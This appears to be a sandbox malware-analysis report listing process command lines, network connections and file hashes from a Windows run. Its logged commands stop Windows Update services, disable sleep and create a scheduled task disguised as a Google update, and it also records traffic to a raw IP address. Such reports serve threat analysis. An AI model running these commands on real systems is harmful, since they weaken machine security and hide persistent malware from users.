"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2912 --field-trial-handle=2236,i,142881780594833536,18431894468913005475,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1832 --field-trial-handle=2236,i,142881780594833536,18431894468913005475,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1776 --field-trial-handle=2236,i,142881780594833536,18431894468913005475,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1604 --field-trial-handle=2236,i,142881780594833536,18431894468913005475,131072 /prefetch:2
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffb627e9758,0x7ffb627e9768,0x7ffb627e9778
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateForcefully"
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /create /f /tn "GoogleUpdateForcefully" /xml "C:\Users\Admin\AppData\Local\Temp\iwzulyohcyoo.xml"
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1612 --field-trial-handle=1748,i,4494399932427304477,634790621541488461,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2088 --field-trial-handle=1748,i,4494399932427304477,634790621541488461,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1748,i,4494399932427304477,634790621541488461,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2956 --field-trial-handle=1748,i,4494399932427304477,634790621541488461,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2936 --field-trial-handle=1748,i,4494399932427304477,634790621541488461,131072 /prefetch:1
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4512 --field-trial-handle=1748,i,4494399932427304477,634790621541488461,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3348 --field-trial-handle=1748,i,4494399932427304477,634790621541488461,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=3120 --field-trial-handle=1748,i,4494399932427304477,634790621541488461,131072 /prefetch:1
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1012 -s 1892
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4524 --field-trial-handle=1748,i,4494399932427304477,634790621541488461,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4940 --field-trial-handle=1748,i,4494399932427304477,634790621541488461,131072 /prefetch:1
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3988 -s 952
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=4884 --field-trial-handle=1748,i,4494399932427304477,634790621541488461,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4828 --field-trial-handle=1748,i,4494399932427304477,634790621541488461,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=1700 --field-trial-handle=1748,i,4494399932427304477,634790621541488461,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1508 --field-trial-handle=1748,i,4494399932427304477,634790621541488461,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=3796 --field-trial-handle=1748,i,4494399932427304477,634790621541488461,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5128 --field-trial-handle=1748,i,4494399932427304477,634790621541488461,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=3692 --field-trial-handle=1748,i,4494399932427304477,634790621541488461,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4936 --field-trial-handle=1748,i,4494399932427304477,634790621541488461,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=5220 --field-trial-handle=1748,i,4494399932427304477,634790621541488461,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=1552 --field-trial-handle=1748,i,4494399932427304477,634790621541488461,131072 /prefetch:1
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=4852 --field-trial-handle=1748,i,4494399932427304477,634790621541488461,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=4596 --field-trial-handle=1748,i,4494399932427304477,634790621541488461,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=3120 --field-trial-handle=1748,i,4494399932427304477,634790621541488461,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=4360 --field-trial-handle=1748,i,4494399932427304477,634790621541488461,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=5492 --field-trial-handle=1748,i,4494399932427304477,634790621541488461,131072 /prefetch:1
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | google.com | udp |
| NL | 142.250.179.142:443 | google.com | tcp |
| US | 8.8.8.8:53 | 142.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.168.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| NL | 142.250.179.202:443 | content-autofill.googleapis.com | tcp |
| US | 8.8.8.8:53 | ogs.google.com | udp |
| NL | 142.250.179.206:443 | ogs.google.com | tcp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| DE | 172.217.23.206:443 | apis.google.com | udp |
| US | 8.8.8.8:53 | ssl.gstatic.com | udp |
| DE | 172.217.23.195:443 | ssl.gstatic.com | tcp |
| US | 8.8.8.8:53 | 195.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| NL | 142.251.36.14:443 | play.google.com | tcp |
| NL | 142.251.36.14:443 | play.google.com | udp |
| US | 8.8.8.8:53 | 131.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.36.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.179.250.142.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| NL | 142.251.36.14:443 | play.google.com | udp |
| US | 8.8.8.8:53 | 226.162.46.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| NL | 142.250.179.142:443 | google.com | udp |
| US | 192.178.48.227:443 | beacons.gcp.gvt2.com | tcp |
| US | 192.178.48.227:443 | beacons.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | 227.48.178.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.3.197.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| US | 192.178.49.163:443 | beacons.gcp.gvt2.com | udp |
| NL | 142.250.179.142:443 | google.com | udp |
| US | 8.8.8.8:53 | 163.49.178.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | encrypted-tbn0.gstatic.com | udp |
| NL | 142.251.36.14:443 | encrypted-tbn0.gstatic.com | tcp |
| NL | 142.251.36.14:443 | encrypted-tbn0.gstatic.com | tcp |
| NL | 142.251.36.14:443 | encrypted-tbn0.gstatic.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 140.82.114.3:443 | github.com | tcp |
| US | 8.8.8.8:53 | id.google.com | udp |
| NL | 142.251.36.3:443 | id.google.com | tcp |
| US | 8.8.8.8:53 | 3.114.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.36.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.133:443 | avatars.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | 154.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| NL | 142.250.179.138:443 | content-autofill.googleapis.com | udp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | user-images.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 138.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 140.82.114.21:443 | collector.github.com | tcp |
| US | 8.8.8.8:53 | 21.114.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 140.82.113.5:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | 5.113.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | camo.githubusercontent.com | udp |
| US | 8.8.8.8:53 | codeload.github.com | udp |
| US | 140.82.112.9:443 | codeload.github.com | tcp |
| US | 8.8.8.8:53 | 9.112.82.140.in-addr.arpa | udp |
| US | 192.178.49.163:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | c.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.f.f.ip6.arpa | udp |
| US | 8.8.8.8:53 | 105.134.101.95.in-addr.arpa | udp |
| PL | 195.3.223.234:80 | 195.3.223.234 | tcp |
| US | 8.8.8.8:53 | 234.223.3.195.in-addr.arpa | udp |
| PL | 195.3.223.234:38397 | tcp | |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | google.com | udp |
| NL | 142.250.179.195:80 | www.gstatic.com | tcp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | 96.134.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 185.199.109.133:443 | avatars.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | user-images.githubusercontent.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 140.82.112.21:443 | collector.github.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.112.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 140.82.113.5:443 | api.github.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | id.google.com | udp |
| NL | 142.251.39.99:443 | id.google.com | udp |
| US | 8.8.8.8:53 | 99.39.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | encrypted-tbn0.gstatic.com | udp |
| NL | 142.251.36.14:443 | encrypted-tbn0.gstatic.com | udp |
| US | 8.8.8.8:53 | 130.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 140.82.113.5:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | 133.121.18.2.in-addr.arpa | udp |
Files
\??\pipe\crashpad_3732_ZWDYFLGQESWWOBER
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json
| MD5 | 99914b932bd37a50b983c5e7c90ae93b |
| SHA1 | bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f |
| SHA256 | 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a |
| SHA512 | 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | d549c564a2a8e81fdf4a539bb19b5dc2 |
| SHA1 | 44425380c4d0f6272e79c46342ded9bcb27b46da |
| SHA256 | 974e0bcaa42871a56c19a462aceba22fa821bc1fbe1ca862759fa0c616293e6a |
| SHA512 | 2a611e12cbd8fb4ca63db9df998a5c71a8c422ec9705814edb84fca241c6dcb893ccc38eac2908268a3ecfe154d1ce12298980b51d0508f0dc6a5d65f0b12979 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | df634e856427efc75681e9e21ff5b5a7 |
| SHA1 | 4e6aa77dd5dc350e872a576d93b103c19101e6bd |
| SHA256 | 338abf3361f3abe2954eb58c94873ca81067667c9ed4cdf5afe81c8bc2d25cc9 |
| SHA512 | 12419445acccf0b5102d26054949f985581ba0afcd47d20b5c1ce0ed9fa893d6363e92253df89ba9d744c6b83159cad7801de3a9cc313d49f53fd2da6738d81c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 6b8ad5cbf79966d3985220e84ab713f0 |
| SHA1 | 83fc5948438a0e30e9a6aabf3d3909131e3b071b |
| SHA256 | 11262250992ba9c6b482a7c37af2be9ba96db67534a516768c31f0cd2e0be624 |
| SHA512 | 69fb10e3f31e5e85e254244dc8f3f9fe4f1ea0a75854eca0a8982b5f8dae8238b53f1c73028fb8c13b31e44cdc5de97cd6001ec60e7395d588de2523b4d5d3fe |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 80c1792b737621bedee450b9ac3cb806 |
| SHA1 | 5d35fba89580a661362da9bad6cf5a98f8c75255 |
| SHA256 | d71b30c1b7bc98eb4d11e05c0ecd78e0a4c3e158da095070fa34f2e413e76787 |
| SHA512 | d954fb491ba3a15b83f13cba26eedad898630152b9de4cf0b9f4d165f4e499f0ac0c933960e937e3d021cc3a00a976505ca1fb93c4703d85fb130c4ca7744acc |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 359ff78e20d5261a573d7c57ead7146c |
| SHA1 | 28028711b88285c2d63dcca7849ac909adf50da3 |
| SHA256 | bc1784b60cec8c8107a22193504497ac5d768fa0f2bbce5083ac538b242d2ef0 |
| SHA512 | 18ee0297944565472368649d2fd8f6f131c303c98fb200c25e4679b8b6075d0855502bed79867c06c368de2c268525ec9df0387c5a97a7e489a0a2acea82b360 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | be1bc247ea6a4c5bd2e212cb26702b85 |
| SHA1 | 7e62aefb43ba3155f4925cbee80dd4418af7487d |
| SHA256 | 1f97519c38eec42a46c80d1e2a3daa83dde728dee1af1cfe3bc27c02b0716d7c |
| SHA512 | a9cf6626de3972dac924d60ffefb56538097dcf995a6c70101005e16f36d3d9567636416c3cc073c12f63ef1a4d15559f30cc5255813f11c476d09ad8b134010 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 39d37f587f7040f623857f29007ac7bb |
| SHA1 | ecb0737630db17e977a2dd832a211cc3ec943f79 |
| SHA256 | 9b64a83fe3cf7ff1e4b82ee268afd4776a10b69f129c52f187b49d575ca65998 |
| SHA512 | 73e40fce9f7b68d2eb8d11b4c7756f5d666ddd38efdbb14ce64c78f495c28ccc860006959e408e0358cc8818690e9f8a2980408f982e664f80ef6ae405268dab |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 178a8e5b96f2740d686c3f0caa412a71 |
| SHA1 | 8c72798638a6ca5b71cbb1a67936bdaab63f43b2 |
| SHA256 | 2444b0c277965e6cab478ac4e4034faa22f327c6bf39ade006e0347b101a4608 |
| SHA512 | 8db298ef547dfabf7da3f50489f5c3466043836da28fafcb31a68664da1081ade0b5d4b988a0e2dbbaf26bca97fe2bfc3509ad815951af44bee5eb0ddb00a9bc |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | ba4cf62c2604d9670d3b9a070898f4b7 |
| SHA1 | 9fa1f6ecf86b5a476c898e4416dd1e98e2691e3a |
| SHA256 | fcc1b5a3c835566d19cd0af44a0d4d65bd3ccc9be3acba8130c0cacb38988a12 |
| SHA512 | d0049483f80412ab0c93db383e96c524c810108c515763eb3f50f787722431bc3ee33416aa5fc2bb4461568ed0167866e306bcbdeb5088ca670be63be9baca8b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | f89ed51ec02afca8e0219342971081a2 |
| SHA1 | 43f666f996d790ec4488f0e87676d6a3b6a0fae0 |
| SHA256 | 1d406aad4fab92c762eeec5fbec8461ec28f177175e8944912351fbf374789da |
| SHA512 | 82e1d9a927ed089571e466085520b5f802d05be07565ca486447f626f3184cd2cee27956da0eb3e4657dd66714c4264e4ec254ab9a01594c1d0c9eaa72910044 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 8a606a597fce3df8264f7b599df561c6 |
| SHA1 | 0326e0685cfcbd6aed65c4089c2290cb00b5d749 |
| SHA256 | 3a3fc2e3281d90e4fd0f20a951b31ef5ff965c283a7508d8542b94ae3dc74ec5 |
| SHA512 | 2ab039c99418b7d2af69a88979c8319e729c079729bbf094286b03522cc5568b4914e1fe3a014e47c715cfb42df8979bfd3f4897e4e6fde9e80789bc305fd3ce |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | a56d3b446cb4a16be837c5a949809868 |
| SHA1 | 7bd2b8f66cbdf617b28285ecee3046a3c36c4d13 |
| SHA256 | dd07fa528d0447bdb7c343138d6395dd1b7e37652d483efff8925606a049c074 |
| SHA512 | 06dd61fb79847fcaff993c30e545cf6ef9aa3ef9811ddb73e34e12c6a048274ed8ba1f7e29963cf89c47e2a4415c46926009351ef5d1d5102275e423a2240232 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000013
| MD5 | fbf073b4909c8ff90a5c3e607ac49e1f |
| SHA1 | c742aded89e83fc6ba81ac779d565fe8004beb55 |
| SHA256 | 8182fe3efc5869af1c587a81d8c7671a498458eb5f5a4a74c3859b9f1557bb8e |
| SHA512 | faf4be5eaf1f32bca514d2dbb271311b9806c4a3373f254dd966997c1ed717c4d217820c71a612cbfc85296934e0b1a10285318eab4193897ec79656a410331f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000014
| MD5 | fca547bc6ae95774598aed494e680860 |
| SHA1 | 6979303dcabf953f3140dfca537a5e0ac438ca97 |
| SHA256 | 303d73a6a109d0bf8aa4e2e5df18b60ef24029835f6b2b65b0025ca371196f08 |
| SHA512 | dba9026c849865af10e369a32104127a69b9e5933548b1f62bb9355e3a9245b167fd9b2338b3a123bd5e82520b44ed073300637c97b678dd83d6182e409d265e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000015
| MD5 | 259cd133b31ec7785dbe52afb1c01fd8 |
| SHA1 | 18539c2a6e2de278a06faef0ad2ae4739a66d863 |
| SHA256 | 85112cabf574e1c66e9c505c55fed1ffb99f5721f6123a101c2061ebd603d06a |
| SHA512 | dd95041a47a4f085b718ba2a96f734adff89956f5859dd7c79f3534b451fc6f0c8513ab27a380706131939ee5075ad3348f1873b7bd0685feebf71303a4a04a5 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 272fa41ae68947da968116076ac0dda6 |
| SHA1 | cfb4a2dd94eb2e17b51052c54a0f0f3fa4083bf5 |
| SHA256 | 7cffd8c71943ce5206cff4107c2f9e2ef7d1aafe72b8d4f0e5c014a23a55dd37 |
